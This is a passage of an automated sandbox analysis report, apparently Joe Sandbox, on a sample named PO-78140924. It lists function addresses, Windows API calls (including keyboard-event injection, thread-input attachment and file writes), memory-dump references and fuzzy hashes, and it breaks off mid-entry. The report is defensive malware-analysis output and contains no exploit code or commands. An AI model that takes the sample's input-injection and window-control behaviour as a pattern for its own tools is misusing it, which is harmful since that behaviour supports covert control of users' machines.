                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 4218babc38f30f65d1b7d6cdc4ec4ebb9dda09c08fb1ae1d95410c1622e08b5a
                                                • Instruction ID: f442050764a87260484c96215cd97a9b81f4e3d13f57b3c8c7bf55589f7e96c8
                                                • Opcode Fuzzy Hash: 4218babc38f30f65d1b7d6cdc4ec4ebb9dda09c08fb1ae1d95410c1622e08b5a
                                                • Instruction Fuzzy Hash: 25F03971505B16CFCB349F64E8948A6BBE5BF043293208A3EE1D682720C731A895DF40
                                                Function 00030911 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00030930
                                                  • Part of subcall function 00017D2C: _memmove.LIBCMT ref: 00017D66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: LongNamePath_memmove
                                                • String ID:
                                                • API String ID: 2514874351-0
                                                • Opcode ID: eed781882d3a17359d8e7909e37df3d8fa6c41d510028a366b0a46dfd1ff5272
                                                • Instruction ID: f6303f75bad6a9be2e9eaeb59264cb8c16f3b2ab4c383ba8b4830e79d33ad9b0
                                                • Opcode Fuzzy Hash: eed781882d3a17359d8e7909e37df3d8fa6c41d510028a366b0a46dfd1ff5272
                                                • Instruction Fuzzy Hash: 75E0867690512857C720D6989C05FFA77EDDF88690F0401B6FC0CD7205D9645C918691
                                                Function 00078F48 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                • Instruction ID: 9e6437a371fb3eac8a3321a48b6c3b99f59898cc5a28527dd37dcb73bf42b37b
                                                • Opcode Fuzzy Hash: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                • Instruction Fuzzy Hash: 0AE092B1608B009BDB358A24D8007E373E1AB06305F00482CF29AC3242EB67B841CB59
                                                Function 0007349E Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0007339D: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,?,?,000734AA,?,?,?,0004DF90,000C55C0,00000002), ref: 0007341B
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,0004DF90,000C55C0,00000002), ref: 000734B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID:
                                                • API String ID: 539440098-0
                                                • Opcode ID: 8d0d28d3eb315c3f841d878f8e67c00f040b3580b28e0b9743e5694bd6beac83
                                                • Instruction ID: b60f14c3d3421a8b6793271c51c01e6f4c7b97ae3f96f4f818ca4875d9dd1b81
                                                • Opcode Fuzzy Hash: 8d0d28d3eb315c3f841d878f8e67c00f040b3580b28e0b9743e5694bd6beac83
                                                • Instruction Fuzzy Hash: 42E0B636410218FBEB20AF94D905FDAB7BDEB04320F10465BF94496111DBB6AF24ABE5
                                                Function 00015DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0004E09B), ref: 00015DBF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: fe3b7c2fe0ce3e8469c661bad4fc527c761e38a24fc1864a59c92a2fb984e0c5
                                                • Instruction ID: daf9c05f43ca79fd8dbf0396063df928d76a050f9c29e4f9c5a7ced60fdefe8b
                                                • Opcode Fuzzy Hash: fe3b7c2fe0ce3e8469c661bad4fc527c761e38a24fc1864a59c92a2fb984e0c5
                                                • Instruction Fuzzy Hash: 47D0C77464020CBFE710DB80DC46FA9777CE705710F100195FD0496290D6B27D508795
                                                Function 000136F9 Relevance: 1.5, APIs: 1, Instructions: 14timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • KillTimer.USER32(?,00000001), ref: 000136FC
                                                  • Part of subcall function 000144CB: _memset.LIBCMT ref: 000144F7
                                                  • Part of subcall function 000144CB: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00014527
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: IconKillNotifyShell_Timer_memset
                                                • String ID:
                                                • API String ID: 4009928425-0
                                                • Opcode ID: f84359e180c324004ced6a9355c4228b6609dc871664c5f9700391539ca20525
                                                • Instruction ID: 45643b2c0bf3ba8075b01e0b328b223dc28cf72cc6fa7b278b00497a0af2c66d
                                                • Opcode Fuzzy Hash: f84359e180c324004ced6a9355c4228b6609dc871664c5f9700391539ca20525
                                                • Instruction Fuzzy Hash: 11C0123A34650472C22072B468466EDA300EB88312B004523FE0AE12828D5601A164B2
                                                Function 00015DCF Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,?,00015921), ref: 00015DEF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 32ee0f079318a2287835dfa247c2c3e2193826411e5b88b1a97b78aa512ca627
                                                • Instruction ID: 74da034ce2dc7ff675681380bf738828743b8d5c50880ec1f779424efa25bd87
                                                • Opcode Fuzzy Hash: 32ee0f079318a2287835dfa247c2c3e2193826411e5b88b1a97b78aa512ca627
                                                • Instruction Fuzzy Hash: 8CE0B679400B01CFD3314F1AE808466FBF5FFE13623208A2FD4E6866A0D3B1588ACB50

                                                Non-executed Functions

                                                Function 0009CB26 Relevance: 70.6, APIs: 37, Strings: 3, Instructions: 632windowkeyboardnativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?), ref: 0009CBA1
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0009CBFF
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0009CC40
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0009CC6A
                                                • SendMessageW.USER32 ref: 0009CC93
                                                • _wcsncpy.LIBCMT ref: 0009CCFF
                                                • GetKeyState.USER32(00000011), ref: 0009CD20
                                                • GetKeyState.USER32(00000009), ref: 0009CD2D
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0009CD43
                                                • GetKeyState.USER32(00000010), ref: 0009CD4D
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0009CD76
                                                • SendMessageW.USER32 ref: 0009CD9D
                                                • SendMessageW.USER32(?,00001030,?,0009B37C), ref: 0009CEA1
                                                • SetCapture.USER32(?), ref: 0009CED3
                                                • ClientToScreen.USER32(?,?), ref: 0009CF38
                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 0009CF5F
                                                • ReleaseCapture.USER32 ref: 0009CF6A
                                                • GetCursorPos.USER32(?), ref: 0009CFA4
                                                • ScreenToClient.USER32(?,?), ref: 0009CFB1
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0009D00D
                                                • SendMessageW.USER32 ref: 0009D03B
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0009D078
                                                • SendMessageW.USER32 ref: 0009D0A7
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0009D0C8
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0009D0D7
                                                • GetCursorPos.USER32(?), ref: 0009D0F7
                                                • ScreenToClient.USER32(?,?), ref: 0009D104
                                                • GetParent.USER32(?), ref: 0009D124
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0009D18D
                                                • SendMessageW.USER32 ref: 0009D1BE
                                                • ClientToScreen.USER32(?,?), ref: 0009D21C
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0009D24C
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0009D276
                                                • SendMessageW.USER32 ref: 0009D299
                                                • ClientToScreen.USER32(?,?), ref: 0009D2EB
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0009D31F
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0009D3BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F$pb
                                                • API String ID: 302779176-2094696308
                                                • Opcode ID: 5c8150f33760f3811d5fc656c4f14f853a686e52c3b6925836f450ce1c851695
                                                • Instruction ID: 5123465a2e0e7bcef871c1af6219229532b10f12def9219075527a24fef6f64a
                                                • Opcode Fuzzy Hash: 5c8150f33760f3811d5fc656c4f14f853a686e52c3b6925836f450ce1c851695
                                                • Instruction Fuzzy Hash: C9429F30605341AFEB20CF24C845EAABBE5FF49314F14092AFA95D72A1C736D954EB92
                                                Function 00097E0D Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 571windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00098502
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: %d/%02d/%02d$0
                                                • API String ID: 3850602802-4206205729
                                                • Opcode ID: 13b88007c939478876e9e115704f05c393f2cf28cbeb2b1404d662757f8d0138
                                                • Instruction ID: d48cfb29079a5c5e13582ea7370154b5c1a0a654b47a4b98597a48186dcc1ae5
                                                • Opcode Fuzzy Hash: 13b88007c939478876e9e115704f05c393f2cf28cbeb2b1404d662757f8d0138
                                                • Instruction Fuzzy Hash: 2012BD71500605AFEF659F28CC49FAE7BF8FF4A310F108169F919EA2A1DB748945DB10
                                                Function 00014A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32(00000000,?), ref: 00014A3D
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0004D9BE
                                                • IsIconic.USER32(?), ref: 0004D9C7
                                                • ShowWindow.USER32(?,00000009), ref: 0004D9D4
                                                • SetForegroundWindow.USER32(?), ref: 0004D9DE
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0004D9F4
                                                • GetCurrentThreadId.KERNEL32 ref: 0004D9FB
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0004DA07
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0004DA18
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0004DA20
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 0004DA28
                                                • SetForegroundWindow.USER32(?), ref: 0004DA2B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0004DA40
                                                • keybd_event.USER32(00000012,00000000), ref: 0004DA4B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0004DA55
                                                • keybd_event.USER32(00000012,00000000), ref: 0004DA5A
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0004DA63
                                                • keybd_event.USER32(00000012,00000000), ref: 0004DA68
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0004DA72
                                                • keybd_event.USER32(00000012,00000000), ref: 0004DA77
                                                • SetForegroundWindow.USER32(?), ref: 0004DA7A
                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0004DAA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 4125248594-2988720461
                                                • Opcode ID: 9fd6229594d5803ff5f2960c8181e91465a54768c3dad9ff55cf8d9e0ad8af61
                                                • Instruction ID: 3352e128e0fdf70fe455b8e74a030394a7204a7334a315b113bf145f55473bac
                                                • Opcode Fuzzy Hash: 9fd6229594d5803ff5f2960c8181e91465a54768c3dad9ff55cf8d9e0ad8af61
                                                • Instruction Fuzzy Hash: D63150B1A40319BAFB206FA19C49F7E7E6CEB44B50F114037FA04EA1D0C6B45D11AAA5
                                                Function 0009C668 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfilenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • DragQueryPoint.SHELL32(?,?), ref: 0009C691
                                                  • Part of subcall function 0009AB69: ClientToScreen.USER32(?,?), ref: 0009AB92
                                                  • Part of subcall function 0009AB69: GetWindowRect.USER32(?,?), ref: 0009AC08
                                                  • Part of subcall function 0009AB69: PtInRect.USER32(?,?,?), ref: 0009AC18
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0009C6FA
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0009C705
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0009C728
                                                • _wcscat.LIBCMT ref: 0009C758
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0009C76F
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0009C788
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0009C79F
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0009C7C1
                                                • DragFinish.SHELL32(?), ref: 0009C7C8
                                                • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0009C8BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
                                                • API String ID: 2166380349-3885641380
                                                • Opcode ID: 4c10c0887a389f4386670cf26eca94e4f4b227a39183ef7867065252c43d8b1a
                                                • Instruction ID: c96a945640046467505c7a6941644f056efd0260a3ef1dff25db855520dfd0b0
                                                • Opcode Fuzzy Hash: 4c10c0887a389f4386670cf26eca94e4f4b227a39183ef7867065252c43d8b1a
                                                • Instruction Fuzzy Hash: B8616A71508301AFD701EF60DC85DAFBBE9FF88750F40092EF695961A2DB709A49CB92
                                                Function 0009C216 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0009C266
                                                • GetFocus.USER32 ref: 0009C276
                                                • GetDlgCtrlID.USER32(00000000), ref: 0009C281
                                                • _memset.LIBCMT ref: 0009C3AC
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0009C3D7
                                                • GetMenuItemCount.USER32(?), ref: 0009C3F7
                                                • GetMenuItemID.USER32(?,00000000), ref: 0009C40A
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0009C43E
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0009C486
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0009C4BE
                                                • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?), ref: 0009C4F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 3616455698-4108050209
                                                • Opcode ID: d4ec65dac28bf96d62251f90721b68504ba72c8b769acfd4ee50ba77d6117de1
                                                • Instruction ID: fd26fb35f2a6e6954d1cd4ed291ccc112a115e730b5479fe4b8a33ae6336652e
                                                • Opcode Fuzzy Hash: d4ec65dac28bf96d62251f90721b68504ba72c8b769acfd4ee50ba77d6117de1
                                                • Instruction Fuzzy Hash: 04815D71A093019FEB10DF14D894EBBBBE8FB88354F10452EF99597291C770D905EBA2
                                                Function 0009D4A8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windownativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • GetSystemMetrics.USER32(0000000F), ref: 0009D4E6
                                                • GetSystemMetrics.USER32(0000000F), ref: 0009D506
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0009D741
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0009D75F
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0009D780
                                                • ShowWindow.USER32(00000003,00000000), ref: 0009D79F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0009D7C4
                                                • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0009D7E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
